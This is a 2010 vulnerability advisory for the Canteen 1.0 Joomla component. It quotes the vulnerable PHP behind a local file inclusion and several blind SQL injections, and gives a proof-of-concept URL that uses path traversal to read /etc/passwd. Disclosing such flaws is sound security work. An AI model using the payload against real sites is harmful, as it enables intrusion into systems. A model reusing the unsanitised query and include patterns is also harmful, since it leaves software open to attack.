Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities
Name Canteen
Vendor http://www.miniwork.eu
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-04-07
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
Canteen is a Joomla 1.5 component.
This component is written for canteens. You can easily
manage daily menu with this component.
II. DESCRIPTION
Some parameters are not sanitised before being used in
SQL queries and in danger PHP's functions.
III. ANALYSIS
Summary:
A) Local File Inclusion
B) Multiple Blind SQL Injection
A) Local File Inclusion
The controller parameter in canteen.php is not sanitised
before being used in the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:
if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
B) Multiple Blind SQL Injection
The meailid parameter in menu.php is not properly
before being used in multiple SQL queries. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code. The following is the affected code:
$mealid = JRequest::getVar('mealid');
$SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby)
VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')";
$mealid = JRequest::getVar('mealid');
$SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";";
$mealid = JRequest::getVar('mealid');
$SQLQuery = "UPDATE #__miniwork_canteen_order SET jo_userid = ".$orduser->id.", jo_changed=NOW(), jo_changedby='".$orduser->sSecondName." ".$orduser->sFirstName."' WHERE jo_mealid=".$mealid." AND jo_userid is null LIMIT 1;";
IV. SAMPLE CODE
A) Local File Inclusion
http://site/path/index.php?option=com_canteen&controller=../../../../../
etc/passwd%00
V. FIX
Checking for path traversal sequence and useing of PHP
function's intval() for integer values.